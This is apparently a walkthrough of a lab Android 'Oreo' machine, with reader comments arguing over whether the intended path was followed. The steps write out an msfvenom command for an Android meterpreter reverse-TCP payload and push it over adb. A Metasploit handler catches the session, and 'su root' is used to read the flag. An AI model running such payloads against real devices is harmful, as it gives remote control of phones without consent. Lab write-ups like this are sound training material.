This is an Android box so we’re going to write adb devices to see the devices connected to our machine and then connect to it by writing adb shell:
Then we’re going to create a shell using
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 R > shell.apk
In msfconsole we’re going to create a multi/handler to connect to the Android box after we push the shell.apk:
Now let’s push the shell to the Android box by using adb push shell.apk /mnt/sdcard:
Now on the Oreo virtual machine we go and install the apk file:
We can see the file on the Android terminal side:
After installing the file and opening it we will get a session on out metasploit:
Now just type shell and then write su root to get root access but while doing that you will get a Permission Denied so just click accept on the root access message on the Oreo machine GUI to be allowed to access the.
Now we navigate to /data/ and we can cat the root.exe file:
that’s not the intended, port 5555 is filtered, you changed the box
LikeLike
im not sure what do you mean by changing the box ?!!! …. I didn’t scan any ports if you read the Walkthrough
LikeLike
the command “adb devices” list the connected devices and their port .. no need to scan for open ports to seen them open or closed or filtered
LikeLike